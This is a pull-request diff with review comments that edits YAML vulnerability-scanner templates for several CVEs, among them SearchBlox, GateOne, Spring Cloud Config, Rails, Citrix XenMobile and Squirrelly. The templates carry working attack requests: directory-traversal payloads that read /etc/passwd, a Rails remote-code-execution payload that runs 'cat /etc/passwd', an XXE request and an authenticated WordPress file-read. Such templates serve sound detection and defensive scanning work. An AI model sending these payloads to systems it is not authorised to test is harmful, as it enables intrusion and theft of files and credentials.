Merge pull request #4686 from MostInterestingBotInTheWorld/dashboard
Dashboard Content Enhancements
patch-1
commit
a359b681e1
|
@ -1,13 +1,14 @@
|
||||||
id: CVE-2020-35580
|
id: CVE-2020-35580
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: SearchBlox < 9.2.2 - Local File Inclusion (LFI)
|
name: SearchBlox <9.2.2 - Local File Inclusion
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: high
|
severity: high
|
||||||
description: Local File Inclusion vulnerability in the FileServlet in all SearchBlox before 9.2.2 allows remote, unauthenticated users to read arbitrary files from the operating system via a /searchblox/servlet/FileServlet?col=url= request. Additionally, this may be used to read the contents of the SearchBlox configuration file (e.g., searchblox/WEB-INF/config.xml), which contains both the Super Admin API key and the base64 encoded SHA1 password hashes of other SearchBlox users.
|
description: SearchBlox prior to version 9.2.2 is susceptible to local file inclusion in FileServlet that allows remote, unauthenticated users to read arbitrary files from the operating system via a /searchblox/servlet/FileServlet?col=url= request. Additionally, this may be used to read the contents of the SearchBlox configuration file (e.g., searchblox/WEB-INF/config.xml), which contains both the Super Admin API key and the base64 encoded SHA1 password hashes of other SearchBlox users.
|
||||||
reference:
|
reference:
|
||||||
- https://hateshape.github.io/general/2021/05/11/CVE-2020-35580.html
|
- https://hateshape.github.io/general/2021/05/11/CVE-2020-35580.html
|
||||||
- https://developer.searchblox.com/docs/getting-started-with-searchblox
|
- https://developer.searchblox.com/docs/getting-started-with-searchblox
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-35580
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||||
cvss-score: 7.5
|
cvss-score: 7.5
|
||||||
|
@ -22,6 +23,8 @@ requests:
|
||||||
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: regex
|
- type: regex
|
||||||
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- "root:.*:0:0:"
|
- "root:.*:0:0:"
|
||||||
part: body
|
|
||||||
|
# Enhanced by mp on 2022/06/28
|
||||||
|
|
|
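Review bot: the `# Enhanced by mp on 2022/06/28` trailer appended here (and to every other template in this PR) records editorial provenance that the commit history already carries, and comments like this accumulate over time; suggest keeping that information in the PR or commit message instead of the template body. Moving `part: body` above the `regex:` list is behaviour-neutral (mapping key order does not matter in YAML) and reads more consistently with the other templates.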
@ -1,20 +1,20 @@
|
||||||
id: CVE-2020-35598
|
id: CVE-2020-35598
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Advanced Comment System 1.0 - Path Traversal
|
name: Advanced Comment System 1.0 - Local File Inclusion
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: high
|
severity: high
|
||||||
description: ACS Advanced Comment System 1.0 is affected by Directory Traversal via an advanced_component_system/index.php?ACS_path=..%2f URI.
|
description: ACS Advanced Comment System 1.0 is affected by local file inclusion via an advanced_component_system/index.php?ACS_path=..%2f URI.
|
||||||
reference:
|
reference:
|
||||||
- https://www.exploit-db.com/exploits/49343
|
- https://www.exploit-db.com/exploits/49343
|
||||||
- https://www.cvedetails.com/cve/CVE-2020-35598
|
|
||||||
- https://seclists.org/fulldisclosure/2020/Dec/13
|
- https://seclists.org/fulldisclosure/2020/Dec/13
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-35598
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||||
cvss-score: 7.5
|
cvss-score: 7.5
|
||||||
cve-id: CVE-2020-35598
|
cve-id: CVE-2020-35598
|
||||||
cwe-id: CWE-22
|
cwe-id: CWE-22
|
||||||
tags: cve,cve2020,lfi
|
tags: cve,cve2020,lfi,acs
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
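Review bot: the renamed `name` and the rewritten description now say "local file inclusion" while the unchanged `cwe-id: CWE-22` (path traversal) and the `ACS_path=..%2f` payload in the same description describe a directory traversal; the original "Path Traversal" / "Directory Traversal" wording matched the CWE. Suggest keeping "Directory Traversal" as the technical term in the description even if the `name` carries the repository's "Local File Inclusion" label for consistency with the `lfi` tag. Swapping the cvedetails link for the NVD link is fine.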
@ -31,3 +31,5 @@ requests:
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
|
|
||||||
|
# Enhanced by mp on 2022/06/28
|
||||||
|
|
|
@ -1,10 +1,10 @@
|
||||||
id: CVE-2020-35736
|
id: CVE-2020-35736
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: GateOne 1.1 - Arbitrary File Retrieval
|
name: GateOne 1.1 - Local File Inclusion
|
||||||
author: pikpikcu
|
author: pikpikcu
|
||||||
severity: high
|
severity: high
|
||||||
description: GateOne 1.1 allows arbitrary file retrieval without authentication via /downloads/.. directory traversal because os.path.join is incorrectly used.
|
description: GateOne 1.1 allows arbitrary file retrieval without authentication via /downloads/.. local file inclusion because os.path.join is incorrectly used.
|
||||||
reference:
|
reference:
|
||||||
- https://github.com/liftoff/GateOne/issues/747
|
- https://github.com/liftoff/GateOne/issues/747
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-35736
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-35736
|
||||||
|
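Review bot: the new description sentence "via /downloads/.. local file inclusion because os.path.join is incorrectly used" is ungrammatical and mislabels the bug; the original "via /downloads/.. directory traversal" was the accurate description of a path-join mistake on a download endpoint. Suggest: "GateOne 1.1 allows arbitrary file retrieval without authentication via directory traversal in /downloads/.. because os.path.join is incorrectly used." The `name` can still use "Local File Inclusion" if that is the naming convention, but the description should keep the correct term.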
@ -30,3 +30,5 @@ requests:
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
|
|
||||||
|
# Enhanced by mp on 2022/06/28
|
||||||
|
|
|
@ -1,10 +1,10 @@
|
||||||
id: CVE-2020-35749
|
id: CVE-2020-35749
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Simple Job Board < 2.9.4 -Arbitrary File Retrieval (Authenticated)
|
name: WordPress Simple Job Board <2.9.4 - Local File Inclusion
|
||||||
author: cckuailong
|
author: cckuailong
|
||||||
severity: high
|
severity: high
|
||||||
description: The plugin does not validate the sjb_file parameter when viewing a resume, allowing authenticated user with the download_resume capability (such as HR users) to download arbitrary files from the web-server via a path traversal attack.
|
description: WordPress Simple Job Board prior to version 2.9.4 is vulnerable to arbitrary file retrieval vulnerabilities because it does not validate the sjb_file parameter when viewing a resume, allowing an authenticated user with the download_resume capability (such as HR users) to download arbitrary files from the web-server via local file inclusion.
|
||||||
reference:
|
reference:
|
||||||
- https://wpscan.com/vulnerability/eed3bd69-2faf-4bc9-915c-c36211ef9e2d
|
- https://wpscan.com/vulnerability/eed3bd69-2faf-4bc9-915c-c36211ef9e2d
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-35749
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-35749
|
||||||
|
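Review bot: dropping "(Authenticated)" from the `name` removes the most important precondition of this template, which the description ("allowing an authenticated user with the download_resume capability") and the login request in the next hunk (`log={{username}}&pwd={{password}}`) both still show; suggest "WordPress Simple Job Board <2.9.4 - Authenticated Arbitrary File Retrieval" or keeping the qualifier in parentheses. The phrase "is vulnerable to arbitrary file retrieval vulnerabilities" is also redundant, and "via local file inclusion" replaces the accurate "via a path traversal attack" (the request uses `sjb_file=../../../../etc/passwd`).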
@ -27,9 +27,11 @@ requests:
|
||||||
Cookie: wordpress_test_cookie=WP%20Cookie%20check
|
Cookie: wordpress_test_cookie=WP%20Cookie%20check
|
||||||
|
|
||||||
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
|
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
|
||||||
|
|
||||||
- |
|
- |
|
||||||
GET /wp-admin/post.php?post=372&action=edit&sjb_file=../../../../etc/passwd HTTP/1.1
|
GET /wp-admin/post.php?post=372&action=edit&sjb_file=../../../../etc/passwd HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
cookie-reuse: true
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
@ -40,3 +42,5 @@ requests:
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
|
|
||||||
|
# Enhanced by mp on 2022/06/28
|
||||||
|
|
|
@ -1,12 +1,12 @@
|
||||||
id: CVE-2020-4463
|
id: CVE-2020-4463
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: IBM Maximo Asset Management Information Disclosure via XXE
|
name: IBM Maximo Asset Management Information Disclosure - XML External Entity Injection
|
||||||
author: dwisiswant0
|
author: dwisiswant0
|
||||||
severity: high
|
severity: high
|
||||||
description: |
|
description: |
|
||||||
IBM Maximo Asset Management is vulnerable to an
|
IBM Maximo Asset Management is vulnerable to an
|
||||||
XML External Entity Injection (XXE) attack when processing XML data.
|
XML external entity injection (XXE) attack when processing XML data.
|
||||||
A remote attacker could exploit this vulnerability to expose
|
A remote attacker could exploit this vulnerability to expose
|
||||||
sensitive information or consume memory resources.
|
sensitive information or consume memory resources.
|
||||||
reference:
|
reference:
|
||||||
|
@ -14,6 +14,7 @@ info:
|
||||||
- https://github.com/Ibonok/CVE-2020-4463
|
- https://github.com/Ibonok/CVE-2020-4463
|
||||||
- https://exchange.xforce.ibmcloud.com/vulnerabilities/181484
|
- https://exchange.xforce.ibmcloud.com/vulnerabilities/181484
|
||||||
- https://www.ibm.com/support/pages/node/6253953
|
- https://www.ibm.com/support/pages/node/6253953
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-4463
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L
|
||||||
cvss-score: 8.2
|
cvss-score: 8.2
|
||||||
|
@ -33,14 +34,19 @@ requests:
|
||||||
</max:QueryMXPERSON>
|
</max:QueryMXPERSON>
|
||||||
headers:
|
headers:
|
||||||
Content-Type: application/xml
|
Content-Type: application/xml
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
part: body
|
||||||
- "application/xml"
|
|
||||||
part: header
|
|
||||||
- type: word
|
|
||||||
words:
|
words:
|
||||||
- "QueryMXPERSONResponse"
|
- "QueryMXPERSONResponse"
|
||||||
- "MXPERSONSet"
|
- "MXPERSONSet"
|
||||||
part: body
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- "application/xml"
|
||||||
|
|
||||||
|
# Enhanced by mp on 2022/06/28
|
||||||
|
|
|
@ -1,13 +1,13 @@
|
||||||
id: CVE-2020-5410
|
id: CVE-2020-5410
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Directory Traversal in Spring Cloud Config Server
|
name: Spring Cloud Config Server - Local File Inclusion
|
||||||
author: mavericknerd
|
author: mavericknerd
|
||||||
severity: high
|
severity: high
|
||||||
description: Spring Cloud Config, versions 2.2.x prior to 2.2.3, versions 2.1.x prior to 2.1.9, and older unsupported versions allow applications to serve arbitrary configuration files through the spring-cloud-config-server
|
description: Spring Cloud Config Server versions 2.2.x prior to 2.2.3, versions 2.1.x prior to 2.1.9, and older unsupported versions allow applications to serve arbitrary configuration files through the spring-cloud-config-server module. A malicious user or attacker can send a request using a specially crafted URL that can lead to a local file inclusion attack.
|
||||||
module. A malicious user, or attacker, can send a request using a specially crafted URL that can lead to a directory traversal attack.
|
|
||||||
reference:
|
reference:
|
||||||
- https://tanzu.vmware.com/security/cve-2020-5410
|
- https://tanzu.vmware.com/security/cve-2020-5410
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-5410
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||||
cvss-score: 7.5
|
cvss-score: 7.5
|
||||||
|
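Review bot: "local file inclusion attack" replaces "directory traversal attack" in the rewritten description, but the request path in the next hunk (`..%252F..%252F...etc%252Fpasswd%23foo/development`) is a double-URL-encoded traversal sequence, so the original term was the accurate one; suggest keeping "directory traversal" in the description regardless of the `name` label. Collapsing the two-line description into a single line is a good change, since the wrapped continuation "module. A malicious user, or attacker, ..." was easy to break as a plain YAML scalar.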
@ -19,12 +19,17 @@ requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development"
|
- "{{BaseURL}}/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development"
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
part: body
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0:"
|
||||||
|
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
- type: regex
|
|
||||||
regex:
|
# Enhanced by mp on 2022/06/28
|
||||||
- "root:.*:0:0:"
|
|
||||||
part: body
|
|
||||||
|
|
|
@ -1,12 +1,13 @@
|
||||||
id: CVE-2020-5776
|
id: CVE-2020-5776
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Cross Site Request Forgery (CSRF) in MAGMI (Magento Mass Importer) Plugin
|
name: MAGMI - Cross-Site Request Forgery
|
||||||
author: dwisiswant0
|
author: dwisiswant0
|
||||||
severity: high
|
severity: high
|
||||||
description: Currently, all versions of MAGMI are vulnerable to CSRF due to the lack of CSRF tokens. RCE (via phpcli command) is possible in the event that a CSRF is leveraged against an existing admin session for MAGMI.
|
description: MAGMI (Magento Mass Importer) is vulnerable to cross-site request forgery (CSRF) due to a lack of CSRF tokens. Remote code execution (via phpcli command) is also possible in the event that CSRF is leveraged against an existing admin session.
|
||||||
reference:
|
reference:
|
||||||
- https://www.tenable.com/security/research/tra-2020-51
|
- https://www.tenable.com/security/research/tra-2020-51
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-5776
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
|
||||||
cvss-score: 8.8
|
cvss-score: 8.8
|
||||||
|
@ -46,3 +47,5 @@ requests:
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
|
|
||||||
|
# Enhanced by mp on 2022/06/28
|
||||||
|
|
|
@ -1,21 +1,21 @@
|
||||||
id: CVE-2020-7943
|
id: CVE-2020-7943
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Puppet Server and PuppetDB sensitive information disclosure
|
name: Puppet Server/PuppetDB - Sensitive Information Disclosure
|
||||||
author: c-sh0
|
author: c-sh0
|
||||||
severity: high
|
severity: high
|
||||||
description: Puppet Server and PuppetDB provide useful performance and debugging information via their metrics API endpoints, which may contain sensitive information
|
description: Puppet Server and PuppetDB provide useful performance and debugging information via their metrics API endpoints, which may contain sensitive information when left exposed.
|
||||||
reference:
|
reference:
|
||||||
- https://puppet.com/security/cve/CVE-2020-7943
|
- https://puppet.com/security/cve/CVE-2020-7943
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-7943
|
|
||||||
- https://tickets.puppetlabs.com/browse/PDB-4876
|
- https://tickets.puppetlabs.com/browse/PDB-4876
|
||||||
- https://puppet.com/security/cve/CVE-2020-7943/
|
- https://puppet.com/security/cve/CVE-2020-7943/
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-7943
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||||
cvss-score: 7.5
|
cvss-score: 7.5
|
||||||
cve-id: CVE-2020-7943
|
cve-id: CVE-2020-7943
|
||||||
cwe-id: CWE-276
|
cwe-id: CWE-276
|
||||||
tags: cve,cve2020,puppet,exposure
|
tags: cve,cve2020,puppet,exposure,puppetdb
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
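Review bot: after this change `reference:` still lists both `https://puppet.com/security/cve/CVE-2020-7943` and `https://puppet.com/security/cve/CVE-2020-7943/`, which differ only by the trailing slash; since the hunk already reorders the references to move the NVD link last, suggest dropping one of the two duplicates in the same edit. The description addition "when left exposed" and the `puppetdb` tag are fine.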
@ -24,16 +24,18 @@ requests:
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: status
|
|
||||||
status:
|
- type: word
|
||||||
- 200
|
part: body
|
||||||
|
words:
|
||||||
|
- "trapperkeeper"
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
part: header
|
part: header
|
||||||
words:
|
words:
|
||||||
- "application/json"
|
- "application/json"
|
||||||
|
|
||||||
- type: word
|
- type: status
|
||||||
part: body
|
status:
|
||||||
words:
|
- 200
|
||||||
- "trapperkeeper"
|
# Enhanced by mp on 2022/06/28
|
||||||
|
|
|
@ -1,15 +1,16 @@
|
||||||
id: CVE-2020-8163
|
id: CVE-2020-8163
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Potential Remote Code Execution on Rails
|
name: Ruby on Rails <5.0.1 - Remote Code Execution
|
||||||
author: tim_koopmans
|
author: tim_koopmans
|
||||||
severity: high
|
severity: high
|
||||||
description: Tests for ability to pass user parameters as local variables into partials
|
description: Ruby on Rails before version 5.0.1 is susceptible to remote code execution because it passes user parameters as local variables into partials.
|
||||||
reference:
|
reference:
|
||||||
- https://web.archive.org/web/20201029105442/https://correkt.horse/ruby/2020/08/22/CVE-2020-8163/
|
- https://web.archive.org/web/20201029105442/https://correkt.horse/ruby/2020/08/22/CVE-2020-8163/
|
||||||
- https://hackerone.com/reports/304805
|
- https://hackerone.com/reports/304805
|
||||||
- https://groups.google.com/g/rubyonrails-security/c/hWuKcHyoKh0
|
- https://groups.google.com/g/rubyonrails-security/c/hWuKcHyoKh0
|
||||||
- https://lists.debian.org/debian-lts-announce/2020/07/msg00013.html
|
- https://lists.debian.org/debian-lts-announce/2020/07/msg00013.html
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-8163
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||||
cvss-score: 8.8
|
cvss-score: 8.8
|
||||||
|
@ -21,12 +22,17 @@ requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}?IO.popen(%27cat%20%2Fetc%2Fpasswd%27).read%0A%23"
|
- "{{BaseURL}}?IO.popen(%27cat%20%2Fetc%2Fpasswd%27).read%0A%23"
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
part: body
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0:"
|
||||||
|
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
- type: regex
|
|
||||||
regex:
|
# Enhanced by mp on 2022/06/28
|
||||||
- "root:.*:0:0:"
|
|
||||||
part: body
|
|
||||||
|
|
|
@ -1,39 +1,40 @@
|
||||||
id: CVE-2020-8209
|
id: CVE-2020-8209
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Citrix XenMobile Server Path Traversal
|
name: Citrix XenMobile Server - Local File Inclusion
|
||||||
author: dwisiswant0
|
author: dwisiswant0
|
||||||
severity: high
|
severity: high
|
||||||
description: |
|
description: |
|
||||||
Improper access control in Citrix XenMobile Server 10.12 before RP2,
|
Citrix XenMobile Server 10.12 before RP2, Citrix XenMobile Server 10.11 before RP4, Citrix XenMobile Server 10.10 before RP6, and Citrix XenMobile Server before 10.9 RP5 are susceptible to local file inclusion vulnerabilities.
|
||||||
Citrix XenMobile Server 10.11 before RP4, Citrix XenMobile Server 10.10
|
|
||||||
before RP6 and Citrix XenMobile Server before 10.9 RP5 and leads to the ability to read arbitrary files.
|
|
||||||
|
|
||||||
reference:
|
reference:
|
||||||
- https://swarm.ptsecurity.com/path-traversal-on-citrix-xenmobile-server/
|
- https://swarm.ptsecurity.com/path-traversal-on-citrix-xenmobile-server/
|
||||||
reference:
|
|
||||||
- https://support.citrix.com/article/CTX277457
|
- https://support.citrix.com/article/CTX277457
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-8209
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||||
cvss-score: 7.5
|
cvss-score: 7.5
|
||||||
cve-id: CVE-2020-8209
|
cve-id: CVE-2020-8209
|
||||||
cwe-id: CWE-22
|
cwe-id: CWE-22
|
||||||
tags: cve,cve2020,citrix,lfi
|
tags: cve,cve2020,citrix,lfi,xenmobile
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd"
|
- "{{BaseURL}}/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd"
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: regex
|
- type: regex
|
||||||
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- "root:.*:0:0:"
|
- "root:.*:0:0:"
|
||||||
part: body
|
|
||||||
- type: word
|
- type: word
|
||||||
|
part: header
|
||||||
words:
|
words:
|
||||||
- "fileDownload=true"
|
- "fileDownload=true"
|
||||||
- "application/octet-stream"
|
- "application/octet-stream"
|
||||||
- "attachment;"
|
- "attachment;"
|
||||||
condition: and
|
condition: and
|
||||||
part: header
|
|
||||||
|
# Enhanced by mp on 2022/06/28
|
||||||
|
|
|
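Review bot: the substantive fix in this hunk is removing the second `reference:` key, a duplicate mapping key that YAML parsers either reject or resolve by silently overriding the first list; that deserves a mention in the PR description. The rewritten description drops "leads to the ability to read arbitrary files", which is the actual impact, and labels the issue "local file inclusion" next to the unchanged `cwe-id: CWE-22` (path traversal) and a `sbFileName=../../../etc/passwd` request; suggest ending the sentence with "... are susceptible to directory traversal that allows reading arbitrary files." The `part:` moves inside the matchers are behaviour-neutral.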
@ -4,17 +4,17 @@ info:
|
||||||
name: Lotus Core CMS 1.0.1 - Local File Inclusion
|
name: Lotus Core CMS 1.0.1 - Local File Inclusion
|
||||||
author: 0x_Akoko
|
author: 0x_Akoko
|
||||||
severity: high
|
severity: high
|
||||||
description: Lotus Core CMS 1.0.1 allows authenticated Local File Inclusion of .php files via directory traversal in the index.php page_slug parameter.
|
description: Lotus Core CMS 1.0.1 allows authenticated local file inclusion of .php files via directory traversal in the index.php page_slug parameter.
|
||||||
reference:
|
reference:
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-8641
|
|
||||||
- https://cxsecurity.com/issue/WLB-2020010234
|
- https://cxsecurity.com/issue/WLB-2020010234
|
||||||
- https://www.exploit-db.com/exploits/47985
|
- https://www.exploit-db.com/exploits/47985
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-8641
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||||
cvss-score: 8.8
|
cvss-score: 8.8
|
||||||
cve-id: CVE-2020-8641
|
cve-id: CVE-2020-8641
|
||||||
cwe-id: CWE-22
|
cwe-id: CWE-22
|
||||||
tags: cve,cve2020,lfi,lotus
|
tags: cve,cve2020,lfi,lotus,cms
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
@ -31,3 +31,5 @@ requests:
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
|
|
||||||
|
# Enhanced by mp on 2022/06/28
|
||||||
|
|
|
@ -31,7 +31,7 @@ requests:
|
||||||
- type: word
|
- type: word
|
||||||
part: body
|
part: body
|
||||||
words:
|
words:
|
||||||
- "<title>400 - Bad Request</title>"
|
- "<title>400 - Bad Request</title>"
|
||||||
|
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
|
|
|
@ -1,17 +1,16 @@
|
||||||
id: CVE-2021-32819
|
id: CVE-2021-32819
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Nodejs squirrelly template engine RCE
|
name: Nodejs Squirrelly - Remote Code Execution
|
||||||
author: pikpikcu
|
author: pikpikcu
|
||||||
severity: high
|
severity: high
|
||||||
description: |
|
description: |
|
||||||
Squirrelly is a template engine implemented in JavaScript that works out of the box with ExpressJS. Squirrelly mixes pure template data with engine configuration
|
Nodejs Squirrelly is susceptible to remote code execution. Squirrelly is a template engine implemented in JavaScript that works out of the box with ExpressJS. Squirrelly mixes pure template data with engine configuration options through the Express render API. By overwriting internal configuration options remote code execution may be triggered in downstream applications. There is currently no fix for these issues as of the publication of this CVE. The latest version of squirrelly is currently 8.0.8. For complete details refer to the referenced GHSL-2021-023.
|
||||||
options through the Express render API. By overwriting internal configuration options remote code execution may be triggered in downstream applications. There is
|
|
||||||
currently no fix for these issues as of the publication of this CVE. The latest version of squirrelly is currently 8.0.8. For complete details refer to the referenced GHSL-2021-023.
|
|
||||||
reference:
|
reference:
|
||||||
- https://securitylab.github.com/advisories/GHSL-2021-023-squirrelly/
|
- https://securitylab.github.com/advisories/GHSL-2021-023-squirrelly/
|
||||||
- https://www.linuxlz.com/aqld/2331.html
|
- https://www.linuxlz.com/aqld/2331.html
|
||||||
- https://blog.diefunction.io/vulnerabilities/ghsl-2021-023
|
- https://blog.diefunction.io/vulnerabilities/ghsl-2021-023
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-32819
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
|
||||||
cvss-score: 8.8
|
cvss-score: 8.8
|
||||||
|
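Review bot: the one-line description keeps the time-bound sentences "There is currently no fix for these issues as of the publication of this CVE. The latest version of squirrelly is currently 8.0.8.", which will go stale inside a template; suggest dropping them or rephrasing as "no fix was available at the time of the advisory" while keeping the pointer to GHSL-2021-023. Collapsing the block scalar into a single line is otherwise fine, and the NVD reference addition is consistent with the rest of the PR.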
@ -28,3 +27,5 @@ requests:
|
||||||
part: interactsh_protocol # Confirms the HTTP Interaction
|
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||||
words:
|
words:
|
||||||
- "http"
|
- "http"
|
||||||
|
|
||||||
|
# Enhanced by mp on 2022/06/30
|
||||||
|
|
|
@ -1,14 +1,15 @@
|
||||||
id: CVE-2021-32820
|
id: CVE-2021-32820
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Express-handlebars Path Traversal
|
name: Express-handlebars - Local File Inclusion
|
||||||
author: dhiyaneshDk
|
author: dhiyaneshDk
|
||||||
severity: high
|
severity: high
|
||||||
description: Express-handlebars is a Handlebars view engine for Express. Express-handlebars mixes pure template data with engine configuration options through the Express render API. More specifically, the layout parameter may trigger file disclosure vulnerabilities in downstream applications. This potential vulnerability is somewhat restricted in that only files with existing extensions (i.e., file.extension) can be included. Files that lack an extension will have .handlebars appended to them. For complete details refer to the referenced GHSL-2021-018 report. Notes in documentation have been added to help users avoid this potential information exposure vulnerability.
|
description: Express-handlebars is susceptible to local file inclusion because it mixes pure template data with engine configuration options through the Express render API. More specifically, the layout parameter may trigger file disclosure vulnerabilities in downstream applications. This potential vulnerability is somewhat restricted in that only files with existing extensions (i.e., file.extension) can be included. Files that lack an extension will have .handlebars appended to them. For complete details refer to the referenced GHSL-2021-018 report. Notes in documentation have been added to help users avoid this potential information exposure vulnerability.
|
||||||
reference:
|
reference:
|
||||||
- https://securitylab.github.com/advisories/GHSL-2021-018-express-handlebars/
|
- https://securitylab.github.com/advisories/GHSL-2021-018-express-handlebars/
|
||||||
